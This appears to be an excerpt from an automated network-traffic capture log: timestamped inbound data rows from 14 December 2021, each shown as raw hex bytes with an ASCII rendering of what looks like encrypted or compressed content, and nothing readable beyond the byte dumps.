f2 19 32 78 a0 22 de ee 92 45 e5 2f 44 bd 20 22 15 c3 54 e4 cc 06 26 e7 82 05 36 8c b5 8b 4e 07 6b 1c 27 8c 2c 0e a5 ec ea 38 bb 09 cd f8 a0 13 39 85 35 2c e0 4b Data Ascii: ~!G..oG)p\|V;!mKdjol;NWtW)- @\e8)rHo4iEOqc?W),>VLI:ECRU8N)@Y',SShg8G>_NU#4'e62x"E/D "T&6Nk',895,K
2021-12-14 11:52:59 UTC	198	IN	Data Raw: 45 29 3b f8 1f 23 48 cc 72 89 e2 0e a4 9c 79 22 dc de d8 3f e7 ad 3c 7b fe 48 23 29 5f 4d 64 d1 b8 2a b9 1c c8 35 d4 75 2d cb 49 0f d5 ea 0d 8b 77 7d a2 9a 84 d8 4e 6c 87 a1 94 77 00 85 1f 3f 70 c6 13 88 19 2f b8 0f 25 87 ee d7 91 5e ed 38 2d a0 4d 40 41 4f b9 59 c0 3b af 8d 3e e6 7e 68 f8 0c 95 6f fb 3b 59 2e 55 88 f3 fd ba a3 0d 65 78 0d 9b 77 cc d2 a4 94 fe cb 89 cd 64 d2 8d ba 37 da 9c 29 48 38 79 b4 c9 13 5c bd 72 4a de c4 8d 89 16 30 0b bc 2d db 56 e7 cd 9c 1f a4 77 6c ce cd 42 b4 a9 42 38 05 92 66 0f ac bf 5b 07 b6 9e b0 88 0a 2b 7f 00 59 3b 52 93 2d 61 68 8b 69 47 f0 fc 52 35 8c 42 98 b2 11 0c 3f 8b e4 f7 3a c4 cc e3 46 42 73 33 40 54 26 ce e3 5b 9c e4 65 7e 81 54 0b c0 6d aa ee c4 fa 03 1b a5 f1 25 47 2a f9 97 6c dc 28 53 08 3a 6a 93 98 66 08 cd Data Ascii: E);#Hry"?<{H#)_Md5u-Iw}Nlw?p/%^8-M@AOY;>~ho;Y.Uexwd7)H8y\rJ0-VwlBB8f[+Y;R-ahiGR5B?:FBs3@T&[e~Tm%Gl(S:jf
2021-12-14 11:52:59 UTC	199	IN	Data Raw: ef 4b 76 24 c8 b3 a3 05 99 f4 16 25 c8 a8 1d 56 b5 37 29 30 66 ca d4 e6 25 34 bf c6 7c d2 6a a9 fc 09 25 7d 07 ab d2 b9 79 ec 7d 29 bc b3 f1 0d 06 ad 49 ce a2 2b 44 97 3c 4f 31 06 50 e7 49 4a 51 f9 89 9f 95 de ab eb 04 5f 44 05 cb ac ab 09 4b bb 44 99 67 f1 52 1b eb 19 f2 ab 44 4d b0 33 5a a4 8b cc 06 1f cd c0 32 d6 83 89 95 59 60 63 31 8c 9e 4d ab 80 7d 81 16 c7 b3 ca 92 64 b6 d2 db 59 06 46 6f 73 0c a9 1f 12 f2 53 76 15 d0 a8 9b e9 a3 57 9b c8 74 2f 96 d0 19 a2 97 e8 9e 5d 14 55 1c b5 e2 ad 9c 68 f5 14 2c 0c 9c fd e8 81 a8 11 eb 74 3b ab e5 1e 45 1f da ec d2 42 e8 85 be 99 45 40 24 32 46 b1 9e e1 09 c3 7d 5e 75 39 b9 b3 f1 ae cf 4e 73 42 7e 44 74 c1 0b 78 c1 1b 67 e3 5f ee df f9 c8 b0 55 93 68 36 10 e5 59 72 ef f8 51 13 f6 1f 22 59 3b 3a 78 80 99 d6 c6 Data Ascii: Kv$%V7)0f%4\|j%}y})I+D<O1PIJQ_DKDgRDM3Z2Y`c1M}dYFosSvWt/]Uh,t;EBE@$2F}^u9NsB~Dtxg_Uh6YrQ"Y;:x
2021-12-14 11:52:59 UTC	200	IN	Data Raw: 2d 60 a9 2d 03 c4 a8 db f4 6f 8c a2 4d 7b 1b 11 bc 4b c8 d0 46 1c 53 c6 c2 73 eb 7f 88 1f 4a a9 c8 d6 2c 6a 52 2d 60 7f a4 5e ad 29 d0 a1 2e b7 6d 3c 88 56 7c 0b 1f 20 0c 9f 60 b6 03 cf ad 6c 7e 37 2c 5d ba 18 45 0b ca 14 cd e3 68 e1 9c 1f 64 df b8 9f 3d 81 e5 1b 1c 9f 6e 44 4b 7e 2a 36 f1 af 46 9e 18 ad 72 f0 07 00 cd 3d 0b fb 84 1c 98 16 70 a6 ff e0 d8 2b 7f bd 92 ae 49 39 8e 0b 4b 77 cf 70 8a 7e 68 8e 02 1e 92 f8 d2 fc 65 e1 2f 48 a6 4c 5d 70 7b d6 49 ce 2a 84 98 2d f0 75 73 d5 04 f1 44 9e 3f 70 3b 7e a0 de f0 b1 c7 22 62 73 68 83 4c ee 8f e1 aa fc c0 89 cd 64 d2 c0 92 36 cb d9 04 59 2e 6d a9 c8 27 28 9c 6e 58 c7 ec 8f c3 37 42 29 a4 29 c5 43 ac f7 82 17 ac 70 4f c6 a9 61 c6 85 46 0a 0c 84 71 74 f7 88 4a 75 87 9d bb c6 31 20 58 61 4d 3b 10 f8 2b 7b 73 Data Ascii: -`-oM{KFSsJ,jR-`^).m<V\| `l~7,]Ehd=nDK~6Fr=p+I9Kwp~he/HL]p{I-usD?p;~"bshLd6Y.m'(nX7B))CpOaFqtJu1 XaM;+{s
2021-12-14 11:52:59 UTC	202	IN	Data Raw: 9a a3 f5 07 04 d4 ae df 5a bd e8 ed b0 e1 9e 2c cc 3e 21 fa 1e a4 a7 a6 a1 02 ba cd 49 31 fe 26 ee 54 2a 8b c2 1f 3e 74 c6 7b 05 37 16 7b 5a 7f bf 69 e4 03 a6 a3 02 31 75 f1 42 c6 42 66 8e 8d 1a ee 40 6d 2b d1 a9 ea 32 96 f7 66 0b a1 80 10 22 87 1e 28 2b 77 c2 99 ca 21 37 d1 e6 7a c9 45 85 8f 2c 2f 6d 21 b7 df a4 70 ec 7d 29 bc b3 f6 11 15 bd 3b d4 b3 26 4b a8 36 5f 37 04 6b f2 39 5c 34 ce be bb 95 d8 ac d3 18 7c 52 69 9d 8f aa 7c 6d 82 3d ad 6f f1 44 02 99 36 f1 cc 57 59 c0 1e 37 f7 a8 c6 1f 08 f7 c0 39 e3 90 8b e1 51 66 78 02 9a 86 4e ab d3 4b 9a 1d c2 8a a5 81 78 b2 e5 be 4d 13 5d 5e 61 1f 9b 1f 01 e5 66 62 65 f1 cd 8e e0 b6 7c 9f ed 61 29 92 c3 20 db 80 e8 ea 45 34 4f 2c 83 f4 9b e8 49 ff 16 2a 69 ab db e8 81 b9 7e cb 65 3d 91 c7 1c 2b 2c da f6 f4 73 Data Ascii: Z,>!I1&T>t{7{Zi1uBBf@m+2f"(+w!7zE,/m!p});&K6_7k9\4\|Ri\|m=oD6WY79QfxNKxM]^afbe\|a) E4O,Ii~e=+,s
2021-12-14 11:52:59 UTC	203	IN	Data Raw: 19 23 7b 72 a4 d1 87 47 85 f3 26 12 20 83 8b 97 0f b9 1d 39 85 6f e9 93 a8 34 6e f7 95 19 08 cb 57 81 24 bf fa 32 9f e1 4d bc 31 52 ee 0b b3 5c 41 53 2f 23 e6 34 c7 77 93 d3 fe f9 3f 35 38 66 24 27 6b b8 35 03 d1 a3 db e5 78 86 bb 43 71 7c 21 bb 3b e3 df 25 1d 4d a5 e2 65 9f 50 81 71 0d 8e ba f9 3f 07 64 2a 6e 55 9e 4c e2 28 e7 b4 1f 99 7c 1c 9d 7a 7f 7b 27 28 10 85 29 99 15 cd a0 4e 7d 59 39 75 cf 16 4f 4e d1 11 a8 f7 7a 88 96 17 64 f0 b0 e9 3b 8b 8c 3d 34 ef 48 51 2a 4e 24 59 da 8d 3e bb 1a dd 41 fe 68 26 aa 6e 05 ff ef 1b 8b 53 6b a2 9a f4 cb 42 77 b6 e6 b0 71 2e 9e 01 2e 7f dc 35 95 7a 0d ad 0f 04 89 f3 bf b5 54 fd 02 69 a2 5b 57 6c 75 a6 4e c2 31 b5 c8 3f f1 65 45 ff 06 82 69 89 21 4c 2e 63 aa f2 99 b8 c6 3f 53 47 1c b7 6c dd c4 e0 a1 ec cc 9f cd 7a Data Ascii: #{rG& 9o4nW$2M1R\AS/#4w?58f$'k5xCq\|!;%MePq?dnUL(\|z{'()N}Y9uONzd;=4HQN$Y>Ah&nSkBwq..5zTi[WluN1?eEi!L.c?SGlz
2021-12-14 11:52:59 UTC	204	IN	Data Raw: f1 94 92 da f4 00 da 65 15 55 8f bb 97 40 7d bc 85 aa 65 9d eb 9d 9d ac a9 3c ac 8c 35 65 ad 15 1c 52 2a 5e 64 83 4d c2 19 bc bd 78 73 40 1f 56 a0 85 44 dc 16 71 f7 be 6f 03 78 82 04 fa 29 fb ea ff 9d 94 00 04 e3 90 f1 44 d2 ca ed b0 e1 ad 5d 8d 34 29 ff 6a b8 bb ad b2 5d cb 8c 40 2d f3 54 fd 7a 3d 8d d3 1f 26 5a 9a 7a 08 2f 73 79 29 4a a0 47 af 09 af bd 6b 3c 51 f4 5c cb 01 67 96 84 68 8c 66 71 31 ce b9 a1 24 aa fa 14 21 a5 89 08 47 a6 67 1e 31 66 ca c5 92 0e 32 a5 d6 70 d3 6c a9 8e 1a 25 7b 58 bd c2 a7 7d 9e 77 0a a7 9e c8 15 02 bc 2c cf c7 38 7e ae 06 68 37 0a 74 eb 4d 4a 23 ba b2 9b 89 cf ab cd 3e 40 4c 75 e8 b9 a2 0e 2e 88 58 9d 5d b5 6f 1c cb 15 ef a3 7c 42 a5 24 5a 84 8b db 2c 29 ca c7 19 e3 82 89 8d 40 66 7e 5d 8b 82 49 8d ec 56 98 1a cc 86 d7 a2 Data Ascii: eU@}e<5eR*^dMxs@VDqox)D]4)j]@-Tz=&Zz/sy)JGk<Q\ghfq1$!Gg1f2pl%{X}w,8~h7tMJ#>@Lu.X]o\|B$Z,)@f~]IV
2021-12-14 11:52:59 UTC	205	IN	Data Raw: f1 31 eb ee 6f 25 dd f1 66 13 e9 a5 82 1b 11 58 58 24 bc 4d 1c 9f 98 eb 1d de 2e ff 96 90 2d 58 ac 11 2c e3 6d e7 d0 a1 42 fb 46 8f 5b 12 e2 76 9a ec 04 ec 94 c8 81 da a6 02 e8 89 f5 4e 6e 50 79 02 08 15 74 ac c0 aa 76 9e e5 06 12 2c 81 96 97 3b a5 1a 12 a3 6d a9 b0 a4 34 7e dc 8b 19 56 e2 4b 9a 3d a5 95 18 f1 c1 28 9e 2c 5f f2 25 aa 46 5b 3c 02 4c c1 2c d4 64 8c d3 f5 d3 2d 41 0a 5a 2f 30 6b a5 6f 3e db b5 af 88 58 9a ac 42 72 7a 21 9f 33 fb c4 23 2b 46 af e8 7b 98 39 89 7a 79 90 81 f0 29 06 74 20 7f 53 85 7f c1 21 d7 b4 1d b1 69 3c 97 78 6e 62 3c 2f 0c eb 5a bd 13 f5 9c 4d 7b 5b 38 5f df 33 4d 4c c5 1d af e6 62 ae 89 1c 16 d8 aa f6 35 89 96 59 28 e6 5e 57 2e 57 63 75 db a4 2a bd 1c d9 5c f8 69 3b aa 4e 0f e8 db 33 9e 6e 7a ac 8a e9 fe 5e 6c b7 8b 90 77 Data Ascii: 1o%fXX$M.-X,mBF[vNnPytv,;m4~VK=(,_%F[<L,d-AZ/0ko>XBrz!3#+F{9zy)t S!i<xnb</ZM{[8_3MLb5Y(^W.Wcu*\i;N3nz^lw
2021-12-14 11:52:59 UTC	207	IN	Data Raw: ff f5 46 9c b1 6d 63 e2 5c 1b a5 0a 99 fb ee de 12 34 b0 fc 34 47 2a f9 97 6c e5 3e 58 3c 37 6e f2 99 62 08 f7 35 3f d5 cf db 75 af bb 9a 5c 57 87 7b 93 fe c6 69 e2 e1 09 0b 73 77 d5 17 c5 9b a8 ea bf d3 eb de 15 c3 78 79 66 9c ce af 5d 53 b5 98 d9 54 a4 df 98 81 bd db 6a aa 9c 2d 4e b7 16 1c 4e 7c 4c 74 9b 66 97 0d bc bb 27 74 50 0b 45 b0 87 44 89 2c 55 f6 c7 66 05 5e b8 35 fd 2a f8 99 d7 9c f3 31 0e ef 9d d6 45 c8 d1 ea d5 e0 c8 6a bd 0f 3e f3 6c 90 b3 a6 bd 45 88 b4 48 3f d1 4a f1 50 31 93 b6 2f 3f 69 98 5c 05 32 73 65 5d 1e 9c 79 b9 13 af a2 2c 12 60 fb 4f cd 09 6f 87 8f 6e 8c 7b 72 3e e4 b1 a1 3b 9f f5 12 40 89 98 08 43 b7 0f 36 3a 7c db b7 d7 22 2d b8 e7 70 d3 77 a9 92 1a 40 51 35 93 ef a6 7f 99 63 29 a6 98 a5 13 13 bc 16 ed a6 2d 7e b4 2d 2b 1f 02 Data Ascii: Fmc\44Gl>X<7nb5?u\W{iswxyf]STj-NN\|Ltf'tPED,Uf^51Ej>lEH?JP1/?i\2se]y,`Oon{r>;@C6:\|"-pw@Q5c)-~-+
2021-12-14 11:52:59 UTC	208	IN	Data Raw: 67 f0 12 74 c6 0b 5e e3 26 89 f7 ec e7 af 52 97 7d 31 18 e8 7c 63 d5 8d 5a 02 f7 32 00 2c 35 3b 41 be a9 d7 d1 b1 5a a8 5a 49 11 60 a9 2e 22 04 cd 7d 37 4f d3 31 de e8 86 69 ca 2f 74 b7 3a 09 3d fc 3a f6 d1 63 3d b1 c0 25 12 f5 a1 a9 07 0f 4d 73 33 ae 67 0c 8a ec ea 2c c9 33 ea 8c a0 21 4a b4 10 43 df 57 f7 c8 cd 63 9e 74 92 41 0a e3 0f 92 fb 18 8d 86 d4 d1 dc ad 63 d6 83 86 6c 6a 48 3b 25 28 18 74 b3 cc ac 6e c4 c3 3d 1f 39 98 8a f0 1a bd 19 0e bf 00 e0 82 b9 05 5b c0 8f 0f 15 c6 48 91 50 91 f0 28 da ca 4d be 36 45 ef 2a a4 69 5b 4f 24 4e cd 36 c8 16 98 df ee e2 1f 25 3d 51 39 37 7d 8e 20 07 d7 a1 a2 a6 47 8a a7 43 77 6b 3f a3 4b ca d8 3f 58 77 aa e8 76 80 7a 81 6f 74 cf 9b e7 39 1e 64 29 34 48 9e 56 d9 27 d8 b0 5f ad 7c 2b 8c 78 76 62 29 20 0b 82 46 b6 Data Ascii: gt^&R}1\|cZ2,5;AZZI`."}7O1i/t:=:c=%Ms3g,3!JCWctAcljH;%(tn=9[HP(M6E*i[O$N6%=Q97} GCwk?K?Xwvzot9d)4HV'_\|+xvb) F
2021-12-14 11:52:59 UTC	209	IN	Data Raw: 80 ac d7 7e ce 19 20 a0 bb 13 b1 ed 29 5a 51 ff 10 42 c3 c9 02 02 e9 f1 ce 8e 6d 4a 1a 01 3f 4c 1a ca 7f 0b 03 e0 0e 2b 91 fc 34 51 f0 18 da d9 74 41 59 cf 8a 86 46 f0 ac 84 37 48 05 3f 52 70 47 f7 9b 26 fa d0 19 76 f0 5a 7d cc 7f 9d 87 ac 84 12 40 d2 91 40 46 4c 8d 96 37 a9 5b 24 22 5b 1a f3 e4 09 79 a8 7b 54 b5 a6 b0 01 af da ec 03 11 f1 05 f1 99 a0 20 94 e0 46 63 19 3e a0 16 80 7a 44 9a d9 bd 98 96 6b aa 0f 71 3e f3 b9 c7 29 11 db f9 ac 31 f3 ac 6d 7c c7 de 3c cb f4 53 5f fd 46 79 32 aa b0 04 f7 13 96 78 b0 cb 78 31 34 63 22 c5 e8 31 87 6b 16 82 be 0a 67 02 cc c6 2d 45 8a 8b f7 e9 b4 71 73 fa c1 b1 33 9d bf 9f db 8f a9 1e e3 52 43 90 19 d2 c8 ce c2 15 8c e3 2c 53 9b 23 98 35 4d 67 77 79 72 1d fa 9f ac 5f 16 0a 24 10 cc 00 ca 7b da c8 04 51 13 15 e3 b8 Data Ascii: ~ )ZQBmJ?L+4QtAYF7H?RpG&vZ}@@FL7[$"[y{T Fc>zDkq>)1m\|<S_Fy2xx14c"1kg-Eqs3RC,S#5Mgwyr_${Q
2021-12-14 11:52:59 UTC	210	IN	Data Raw: 22 09 b6 14 2a 3b 23 32 8a f8 7e ed 84 0f f3 79 ac 76 38 fb 8d db ae e1 79 7a 9e 27 24 4b 38 4c 2a a6 49 23 de 6f ac 34 9f 19 48 ae 37 6b 8d a4 7d ff 16 1b ca f8 82 b1 25 16 da f7 70 3a 54 e5 6a 4b 13 a9 6c fd 1b 6c dd 7a 6c fa 98 bf d2 23 08 28 28 e7 29 29 1b 12 dc 3d ae 50 d5 d9 cd ad 0c 14 b3 66 d1 0a e9 c9 3d 5f 0a c7 80 85 c3 a7 4b 0d 1a 74 d2 1f a9 a5 cd c7 98 ae e3 a0 2a b4 c2 db 41 b8 95 76 28 c0 88 dc b4 29 34 d2 0b 36 af 94 e0 f0 6f 20 48 d4 5c b7 36 b7 b0 f2 6a d6 17 3c b3 9c 3a b6 ee 2b 49 67 eb 05 42 cb c7 22 15 db fd c1 da 78 41 07 12 0b 43 24 ce 68 0f 09 e9 1a 31 a0 f2 28 4c e5 13 c7 c9 43 4b 53 e5 8a 95 46 10 23 98 a5 f8 05 3f 46 1d 57 9b 9b 26 e6 a8 0c 1b fe 27 7a b7 ec 71 8e af 96 6b 41 cb 89 5c 5a 51 81 ff 2e ab 45 36 53 59 0a f3 eb 19 Data Ascii: ";#2~yv8yz'$K8LI#o4H7k}%p:TjKllzl#(())=Pf=_Kt*Av()46o H\6j<:+IgB"xAC$h1(LCKSF#?FW&'zqkA\ZQ.E6SY
2021-12-14 11:52:59 UTC	211	IN	Data Raw: 85 1a e9 23 71 52 d5 dd ad 56 9b 9b 0a 40 c9 ec 62 25 da 7a 5e 4d 90 be aa 97 5e d9 c4 88 1a a0 1f d1 f9 66 48 1b da e6 b6 cc 01 e9 13 49 c0 ea 85 75 6b cd 54 b8 c3 5f 1a df 5a 22 58 64 19 9b 24 2a 4c bf e9 fa ff 39 ce bf 69 28 29 18 98 df 45 5d 33 ea 20 ec 10 98 13 ed bc 6d 99 d1 15 32 e0 57 5b e6 6c 9e 75 4d a5 b5 5a 04 c4 e3 c1 36 11 8e 64 d0 c7 3e d3 85 22 ed 70 ab eb a5 c2 00 c3 aa de 23 66 3a 21 90 4f cc 68 15 80 07 0b 66 b5 a8 e8 85 d0 0d e7 bb 08 5e ff aa 45 de e7 8f 9b 14 79 24 48 cd 8f cd 92 3c 9d 74 56 e9 74 ab 99 ec ca 1f 85 14 52 f1 bb 74 36 6e b1 9e ba 0b 94 e7 59 80 11 ab 5d 4a 16 c4 e3 8e 70 de 3c 33 1e 4a dd e1 95 a0 82 39 03 0b 14 11 00 b1 62 07 a7 5b 13 86 5d 94 bf 83 99 fe 3c e6 14 41 64 81 3f 0e ac 8f 20 62 9e 68 5a 5c 04 58 26 ca c8 Data Ascii: #qRV@b%z^M^fHIukT_Z"Xd$*L9i()E]3 m2W[luMZ6d>"p#f:!Ohf^Ey$H<tVtRt6nY]Jp<3J9b[]<Ad? bhZ\X&
2021-12-14 11:52:59 UTC	213	IN	Data Raw: 20 54 56 67 d0 47 4a be d0 c9 24 a3 f9 cb 36 06 09 d1 73 48 8d a7 02 5a 33 df 83 05 eb 39 ee 1b 2d cf c8 9e 4e ea 01 44 1a 16 cb 3b bf cc 14 c4 f3 ff 0b db 40 05 1c 2b 52 40 6e 69 28 d4 47 af c7 a1 b9 3f 55 23 a8 f8 86 17 af 52 cc 8f 1c 63 58 70 63 ba cc 1e 6f f5 64 6c 73 9a 2d 21 4a 34 4f 33 b4 c8 54 59 4a b7 32 9d 12 5a 28 30 68 92 8a 70 f1 18 0e cf f1 8a aa 3a 9a 6d e4 ff 0d 41 f6 62 40 31 a8 65 ff 9b d9 df 68 6d f5 9c b8 c7 23 0b ec 2f c9 26 3f 3e 1c c3 2b 29 eb d9 db 4c 87 10 1d ae 72 73 bf f9 46 32 52 0d c7 8e 18 ea b1 cb e8 0e 6f dc 16 bd a5 26 c9 9d a1 e3 aa 04 a8 ce db 5d aa 8d e8 8f 43 07 ce ae 5d 26 c6 10 2e bd 87 ec ff 1a 2d 46 d5 40 a8 25 8c b0 e1 64 cc 1c 34 b3 28 be b5 e4 36 46 7f 75 ad 50 aa c9 bf a6 e8 d3 dd d4 e7 f2 14 05 1e 5e 34 4e b9 Data Ascii: TVgGJ$6sHZ39-ND;@+R@ni(G?U#RcXpcodls-!J4O3TYJ2Z(0hp:mAb@1ehm#/&?>+)LrsF2Ro&]C]&.-F@%d4(6FuP^4N
2021-12-14 11:52:59 UTC	214	IN	Data Raw: cc 90 8f fd 16 7e 63 99 dd 32 76 b0 a8 8c 57 9e af 10 f7 48 cf 9b 1c df da ce c6 23 0a 52 2f 53 87 34 1a 38 5d e9 b8 71 47 0c 6a aa 6b 55 03 19 ab 13 cd 0e c4 6e df dd 80 ee 03 9b 3c 2b 2c 0b f7 f0 98 39 21 11 40 20 9d cf 76 fa 8e 74 c3 cd ee 6f 22 c7 66 52 4a 00 2c b2 90 42 49 50 d5 14 9d 1a d9 ed ed 49 0b 4b ff b8 c8 15 f9 1f cf c1 ee ab 66 f7 88 4d 9d c7 4c 1a ce 5e 21 56 7a 01 82 2b ad 74 a6 f3 97 e6 bc d3 a3 60 33 3c 07 94 ed c5 6e ac d6 20 ec 1f f4 0d 68 9f 6d 99 d0 0d 28 dd 4a 47 f5 e6 a9 53 6f a5 ba 56 83 ff e6 e7 37 1f 1e 68 d6 fa 21 d3 8e 22 fa 4d aa e7 a1 db 18 c8 aa de 36 6b 06 37 0a 6f da ea ea 81 15 8e 25 a0 ba 69 15 d6 1a 7b fe 1b 47 f9 ac 45 c6 e2 83 8c 9b 71 3d 40 d1 9c d4 80 27 88 f6 07 7b 81 a1 8c f2 d0 0d 85 0d 52 e8 bb 73 2c 6b bd 90 Data Ascii: ~c2vWH#R/S48]qGjkUn<+,9!@ vto"fRJ,BIPIKfML^!Vz+t`3<n hm(JGSoV7h!"M6k7o%i{GEq=@'{Rs,k
2021-12-14 11:52:59 UTC	215	IN	Data Raw: 38 09 6b 51 66 03 dc b7 b5 0a e4 d1 48 4f 5c fe 64 0e 69 ce e8 26 d3 12 06 7e cc 48 9b f3 e1 64 65 aa 39 e6 5e d8 89 40 8d 31 1d d5 4b 39 84 58 cd 3a a9 7c 5d 3f ad 52 bf 1e f7 b2 98 b5 50 53 d8 63 4e 2d 06 c0 49 77 b0 d0 c7 bb 16 e2 c9 3f 03 07 41 5b 0b 9e a7 c7 fd 34 d4 06 55 e6 19 ea 1e 03 de 48 6b 5b ea f8 55 99 23 f4 3f b9 40 bb c8 79 e3 11 44 ed 04 12 16 5b 49 77 e3 34 d0 6f b7 dd 2b 10 25 24 33 b2 72 3e 03 ac 72 cf 85 00 ef d0 7e 76 ac cc 1e c3 e6 f7 d8 3b 91 23 36 59 bb d4 37 a6 49 06 d6 71 a3 28 99 0f 55 af 35 77 99 99 7b f7 04 92 81 ed ed b7 23 12 df ee ff 0d 47 e5 64 45 19 a0 6b ea 15 74 cf f9 54 e8 80 ba cf 34 94 58 3f 45 a1 29 1b 01 d3 28 29 7f c6 cd 5e fd 16 1a b9 7f ec 0f e6 4d 2d 5d 02 cb 94 84 dc b1 c9 89 1a 75 d3 0a 2b 8a b6 ad 9a 8f ed Data Ascii: 8kQfHO\di&~Hde9^@1K9X:\|]?RPScN-Iw?A[4UHk[U#?@yD[Iw4o+%$3r>r~v;#6Y7Iq(U5w{#GdEktT4X?E)()^M-]u+
2021-12-14 11:52:59 UTC	216	IN	Data Raw: ff c9 96 f1 b4 91 92 6d ab 04 6c 22 7c 22 c2 27 3d de e0 a4 24 e0 3f 74 ec c7 d3 29 d9 68 d8 3b f6 73 6b a1 b3 2c 0f e2 00 16 f3 d8 c1 76 3e 3d 63 2c c6 e3 38 87 6d 1c 8b b6 00 6e 04 de 41 a8 44 84 97 8b 6c 15 71 67 9d ca b4 37 ac 3c b7 da b3 ab 1f ec 54 5c 17 37 c0 55 fa c2 b0 b1 e9 29 5a 90 2c 90 36 77 e7 bc 78 54 0c 68 87 6d 5e 16 0b 29 1a c9 00 ca 67 ce c8 02 5f 01 91 c1 a9 6c 02 e6 e7 0b 0c bf 1b 12 a1 dd c4 52 fa 99 66 40 cc ec 78 22 d4 63 5b 4f 12 af b3 9d 4c 5b d1 91 ef bd 1a cc f8 6e 4f 09 58 fb ab 39 1c ec 0c 4a cf ee a3 7f 73 ce 54 ac 47 f3 1e dc 44 3a d8 cf 02 99 3d 27 59 b2 e9 fa db b8 c6 b7 70 28 2b 07 97 c5 cf 60 33 ea 35 e1 0a f9 04 4f 9b 7a 94 c4 14 14 c1 54 50 f0 e9 aa 78 66 ac bc 43 83 d1 e4 ea 3e 0b 19 5a c8 ec 3a c6 9d 35 e0 72 bf ed Data Ascii: ml"\|"'=$?t)h;sk,v>=c,8mnADlqg7<T\7U)Z,6wxThm^)g_lRf@x"c[OL[nOX9JsTGD:='Yp(+`35OzTPxfC>Z:5r
2021-12-14 11:52:59 UTC	218	IN	Data Raw: 68 4e 14 cd 84 88 86 a8 b5 84 74 e0 59 d5 db 5f e2 c4 1f 47 c7 25 6d f5 fe 29 1a b3 5f 88 79 7d 45 2b 40 8e 2a a1 18 9b b9 c5 39 fd 13 fa 20 ff e4 7e d5 99 65 9f 60 49 c3 3b 01 71 05 1e fd 1d 0f 25 07 f6 a9 7c 01 c3 b7 58 f3 e4 8e 46 61 4a fe 65 73 7a 5c 8d 6e cc 00 84 f5 4d be 08 33 29 64 7a ab 23 ed 41 56 6c 4e 1f 56 3a 5d 96 23 06 a0 cb 21 28 3e 53 a3 4b 54 a0 96 06 b2 9d bf 4c c1 bd 31 dc a0 02 c8 42 78 3e 29 c9 26 df ee 4b ce 1c 13 54 d8 59 0b 5a 54 d8 c4 cd a7 11 f9 b9 02 0e 8d 27 c6 90 44 6c 06 46 08 9a 07 30 bd 6e b0 c7 f1 12 08 d9 0d 17 08 8b 86 50 fe d2 27 d0 60 a8 c7 a3 f4 25 cd d7 a8 7d 2f 16 a7 7c c5 89 13 ef f7 77 67 b1 c3 91 52 fa eb 50 5b 9b 2c 32 cb d2 43 38 ba c0 41 de 76 a4 3d 9d 0f 40 82 3a 78 94 91 6c 7e 8f 12 d3 7f 68 aa 39 99 41 e7 Data Ascii: hNtY_G%m)_y}E+@*9 ~e`I;q%\|XFaJesz\nM3)dz#AVlNV:]#!(>SKTL1Bx>)&KTYZT'DlF0nP'`%}/\|wgRP[,2C8Av=@:xl~h9A
2021-12-14 11:52:59 UTC	219	IN	Data Raw: 9c 5d 87 83 2b e0 a3 8a 1f f0 ba 67 b7 ec f4 9d 30 9e 7f 4c 56 90 48 4f 58 8e 62 aa a8 49 b7 53 58 3a f3 f8 86 74 b5 7c 5e bd b9 32 05 ab e4 ea 03 12 f6 0d ea 85 24 99 97 f3 db 73 19 19 a3 06 13 fe c9 9b d9 bc 88 1a 69 ac 2c 78 31 ec 3a c7 22 17 db e2 b8 b0 6b bf ff 6c c1 d3 36 eb e9 54 28 79 ff 78 32 ab 25 0a d7 13 96 7f cb 4e e1 31 27 ec 2c e6 ec 3f 9b e4 89 8b ac 89 fb 09 d8 43 9a c7 84 88 1b eb 9c 6e 64 9f d2 b6 3e a0 b8 8b c4 12 08 1f f0 db 45 91 3e d3 c6 42 4e 3f 94 e4 0d 5f 80 a7 05 3d 57 ef a3 6d d3 b8 e9 0d e8 53 13 23 29 0f 4e 04 c0 4f ca da 10 de 98 94 3c 2b 64 06 e4 f3 98 cd 28 3f 56 a0 cf 46 17 e7 9e 7b 45 c0 e6 7b 24 dc 7a 5e 42 17 a7 bf 9a 4f 51 d0 9d 15 ad 1b ce e2 6e 50 17 58 e1 ab cf 3c ee 13 49 c0 e2 a9 07 76 a0 49 dc c7 6a 1b eb 59 19 Data Ascii: ]+g0LVHOXbISX:t\|^2$si,x1:"kl6T(yx2%N1',?Cnd>E>BN?_=WmS#)NO<+d(?VF{E{$z^BOQnPX<IvIjY
2021-12-14 11:52:59 UTC	220	IN	Data Raw: 11 17 00 b3 7e 1b b5 6e 15 86 5f 89 ba 8d 97 f9 3b e5 09 44 79 84 37 06 ac 8d 3d 67 83 6d 47 59 5c 5f 0c df da a3 b4 c3 11 cd 23 49 62 05 dd 71 65 71 a4 19 7a 2e a0 45 bb 9a cd 0c b3 2f 37 d8 54 7d 5c 95 54 85 9a 06 44 b1 82 66 60 8c d1 dd 4e 62 3d 1c 41 da 2c 69 f3 ec a8 6f bb 4a 9a f8 e4 44 39 c0 62 2c a6 1c 92 b1 cd 31 fb 13 fb 32 7e 91 76 d9 9e 61 8d e0 ad d1 bb d4 63 85 fa f5 18 0f 25 15 76 4d 7b 01 c1 a5 d8 17 ea 80 4f 66 49 ec e5 97 68 dc 69 66 c6 00 87 e7 cd 5a 1a b3 fc 6a 78 a4 24 e8 50 d6 95 5c 9f b2 28 dd 43 31 86 44 c3 28 28 3c 41 23 af 5a b1 16 ff ba 9a bd 5e 41 59 23 5c 44 0e c8 41 6a be cd db a6 0a ff cb 37 1c 1b 43 da 4b 8b 96 46 58 b5 de 87 15 eb 01 ee 1f 8d cf c8 9e 4a 6a 01 44 1a 1a eb 38 ad 4e b5 d4 71 ff 19 59 e5 49 1a 0b d3 41 7f eb Data Ascii: ~n_;Dy7=gmGY\_#Ibqeqz.E/7T}\TDf`Nb=A,ioJD9b,12~vac%vM{OfIhifZjx$P\(C1D((<A#Z^AY#\DAj7CKFXJjD8NqYIA
